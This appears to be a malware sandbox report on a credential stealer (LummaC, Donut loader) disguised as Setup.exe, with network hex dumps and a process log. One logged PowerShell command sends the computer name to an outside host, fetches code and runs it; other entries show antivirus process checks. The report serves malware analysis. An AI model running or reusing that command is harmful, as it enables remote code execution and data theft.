                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC1369INData Raw: 40 00 00 00 00 00 02 08 56 56 61 72 69 61 6e 74 02 00 00 11 40 00 00 00 00 00 02 0a 56 49 6e 74 65 72 66 61 63 65 02 00 00 11 40 00 00 00 00 00 02 0b 56 57 69 64 65 53 74 72 69 6e 67 02 00 b4 2a 40 00 00 00 00 00 02 06 56 49 6e 74 36 34 02 00 00 11 40 00 00 00 00 00 02 0e 56 55 6e 69 63 6f 64 65 53 74 72 69 6e 67 02 00 54 11 40 00 00 00 00 00 02 0a 5f 52 65 73 65 72 76 65 64 31 02 00 b4 10 40 00 04 00 00 00 02 05 56 54 79 70 65 02 00 02 00 00 00 00 00 00 0c 32 40 00 0e 0b 54 50 74 72 57 72 61 70 70 65 72 04 00 00 00 00 00 00 00 00 01 00 00 00 a0 2a 40 00 00 00 00 00 00 05 56 61 6c 75 65 02 00 02 00 06 00 0a 28 9c 4a 00 06 43 72 65 61 74 65 00 00 00 00 00 00 01 00 54 11 40 00 06 41 56 61 6c 75 65 02 00 02 00 0a c0 f5 40 00 06 43 72 65 61 74 65 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: @VVariant@VInterface@VWideString*@VInt64@VUnicodeStringT@_Reserved1@VType2@TPtrWrapper*@Value(JCreateT@AValue@Create
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC1369INData Raw: 28 9c 4a 00 0a 52 65 61 6c 6c 6f 63 4d 65 6d 03 00 08 32 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 08 32 40 00 01 00 06 4f 6c 64 50 74 72 02 00 00 54 11 40 00 02 00 07 4e 65 77 53 69 7a 65 02 00 02 00 34 00 28 9c 4a 00 07 46 72 65 65 4d 65 6d 03 00 00 00 00 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 08 32 40 00 01 00 03 50 74 72 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 cc 4b 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66
                                                                                                                                                                                                                                                            Data Ascii: (JReallocMem2@Self2@OldPtrT@NewSize4(JFreeMemSelf2@Ptrb(JCopySelfK@Src@StartIndex2@Dest@Countb(JCopySelf
                                                                                                                                                                                                                                                            2025-01-01 18:04:20 UTC1369INData Raw: 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 28 4d 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 60 4d 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53
                                                                                                                                                                                                                                                            Data Ascii: 2@Dest@Countb(JCopySelf2@Src(M@Dest@StartIndex@Countb(JCopySelf`M@Src@StartIndex2@Dest@Countb(JCopyS


                                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:13:03:55
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'543'377 bytes
                                                                                                                                                                                                                                                            MD5 hash:F24FCF422C2611892A30ADF91D85F556
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                            Start time:13:04:19
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Fg
                                                                                                                                                                                                                                                            Imagebase:0x70000
                                                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:13:04:19
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                            Start time:13:04:27
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe"
                                                                                                                                                                                                                                                            Imagebase:0x840000
                                                                                                                                                                                                                                                            File size:8'767'044 bytes
                                                                                                                                                                                                                                                            MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:13:04:28
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$20460,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe"
                                                                                                                                                                                                                                                            Imagebase:0x9e0000
                                                                                                                                                                                                                                                            File size:3'367'424 bytes
                                                                                                                                                                                                                                                            MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                                            Start time:13:04:30
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT
                                                                                                                                                                                                                                                            Imagebase:0x840000
                                                                                                                                                                                                                                                            File size:8'767'044 bytes
                                                                                                                                                                                                                                                            MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                                            Start time:13:04:30
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp" /SL5="$B0060,7785838,845824,C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENT
                                                                                                                                                                                                                                                            Imagebase:0x800000
                                                                                                                                                                                                                                                            File size:3'367'424 bytes
                                                                                                                                                                                                                                                            MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                            Start time:13:04:56
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"timeout" 9
                                                                                                                                                                                                                                                            Imagebase:0x7ff796770000
                                                                                                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                            Start time:13:04:56
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff675890000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff7b65d0000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "wrsa.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff701940000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff675890000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "opssvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff701940000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff675890000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff7b65d0000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                                            Start time:13:05:05
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "avastui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff701940000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff7b65d0000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "avgui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff701940000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff675890000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
